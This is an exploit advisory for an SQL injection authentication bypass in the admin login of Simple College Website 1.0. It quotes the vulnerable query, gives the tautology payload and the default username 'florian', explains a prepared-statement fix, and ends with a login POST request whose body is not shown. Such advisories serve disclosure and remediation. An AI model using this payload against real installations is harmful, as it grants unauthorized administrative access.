Simple College Website 1.0 SQL Injection

Simple College Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass. Original discovery of SQL injection in this version is attributed to yunaranyancat in October of 2020.

MD5 | 027ad1acbd37ef2d9dd3fb01b5fc4e7a

# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
# Exploit Author: Marco Catalano (@stunn4)
# Date: 2021-01-25
# Vendor Homepage:
# Software Link:
# Affected Version: 1.0
# Vulnerable parameter: "name" (POST method)
# Tested on: Linux, PHP/7.4.11

The source of the "/admin_pages/login.php" file contains the following line of code:

$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");

which is executed when a user attempts to log into the administrative panel at "/admin_pages/login.php" itself. Both $name and $password are interpolated directly into the query string, so any single quote in the submitted values changes the structure of the SQL statement.

Proof Of Concept:

The user input is not sanitized or parameterized, which allows an authentication bypass with the classic payload "<username>' or '1' = '1 -- -" submitted as the name, where <username> must be a valid username. For example, the default username is "florian". The closing quote terminates the name literal, the "or '1' = '1" clause is always true, and "-- -" comments out the remainder of the statement, including the password check.
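The fix for this class of bug is to stop building the query from interpolated strings and bind the user-supplied values as parameters. The snippet below is an added example, not code from the Simple College Website project; it rewrites the vulnerable query from "/admin_pages/login.php" using a mysqli prepared statement. It assumes $conn is an open mysqli connection, that the users table has the name and Password columns shown in the original query, and that the password field is posted as "password" (the page only names the "name" parameter, so that field name is an assumption).

```php
<?php
// Added example (not the project's own code): the login lookup from
// /admin_pages/login.php rewritten with a prepared statement.
// Assumes: $conn is an open mysqli connection; the `users` table has
// `name` and `Password` columns (taken from the vulnerable query).
//
// Vulnerable original, for comparison (do NOT use):
//   mysqli_query($conn, "SELECT * FROM users WHERE name='$name' AND Password='$password'");

function find_user(mysqli $conn, string $name, string $password): ?array
{
    // Placeholders take the place of the interpolated '$name' and '$password'.
    // The driver sends the SQL text and the values separately, so a quote,
    // an "or '1'='1" clause or a "-- -" comment inside $name is compared as
    // literal data against the `name` column and can never alter the query.
    $stmt = $conn->prepare(
        "SELECT * FROM users WHERE name = ? AND Password = ?"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }

    // 'ss' = two string parameters, bound by reference in order.
    $stmt->bind_param('ss', $name, $password);
    $stmt->execute();

    // get_result() requires the mysqlnd driver (default in modern PHP builds).
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Usage (connection parameters and the "password" field name are hypothetical):
// $conn = new mysqli('localhost', 'dbuser', 'dbpass', 'college');
// $user = find_user($conn, $_POST['name'] ?? '', $_POST['password'] ?? '');
// if ($user === null) {
//     // invalid credentials: do not start an admin session
// }
```

With the bound parameter, the payload from the proof of concept is looked up verbatim as a username, matches no row, and the function returns null. The original query also compares the password in clear text; a complete remediation would additionally store a password hash (password_hash()) and compare it with password_verify() after the row is fetched, rather than matching the Password column in SQL.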

POST /admin_pages/login.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Connection: close
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1

